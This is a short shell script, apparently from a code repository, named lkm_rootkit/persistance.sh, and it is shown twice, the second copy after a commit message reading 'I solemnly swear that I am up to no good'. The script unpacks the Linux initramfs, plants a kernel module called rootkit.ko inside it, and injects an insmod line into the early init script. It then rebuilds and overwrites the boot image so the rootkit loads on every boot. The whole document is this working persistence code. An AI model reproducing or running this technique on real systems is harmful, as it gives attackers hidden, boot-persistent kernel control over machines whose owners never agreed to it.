lkm_rootkit/persistance.sh

#!/usr/bin/env sh
set -eu

mkdir /tmp/initrfs && cd $_
LINE="# this should always be the last thing we do before the switch_root."
FILE="/boot/initramfs-linux.img"
if [[ -f /boot/initramfs-linux-lts.img ]]; then
	FILE="/boot/initramfs-linux-lts.img"
fi

lsinitcpio -x $FILE
cp /home/vagrant/rk/rootkit.ko /tmp/initrfs/BOOM_rk.ko
sed -i "/$LINE/ { N; s/$LINE\n/insmod \/BOOM_rk.ko\n&/ }" /tmp/initrfs/init
find -mindepth 1 -printf '%P\0' | LANG=C bsdcpio -0 -o -H newc --quiet | gzip > /tmp/init.img
cp /tmp/init.img $FILE
I solemnly swear that I am up to no good. 2021-11-30 22:59:25 +01:00			`#!/usr/bin/env sh`
			`set -eu`

			`mkdir /tmp/initrfs && cd $_`
			`LINE="# this should always be the last thing we do before the switch_root."`
			`FILE="/boot/initramfs-linux.img"`
			`if [[ -f /boot/initramfs-linux-lts.img ]]; then`
			`FILE="/boot/initramfs-linux-lts.img"`
			`fi`

			`lsinitcpio -x $FILE`
			`cp /home/vagrant/rk/rootkit.ko /tmp/initrfs/BOOM_rk.ko`
			`sed -i "/$LINE/ { N; s/$LINE\n/insmod \/BOOM_rk.ko\n&/ }" /tmp/initrfs/init`
			`find -mindepth 1 -printf '%P\0' \| LANG=C bsdcpio -0 -o -H newc --quiet \| gzip > /tmp/init.img`
			`cp /tmp/init.img $FILE`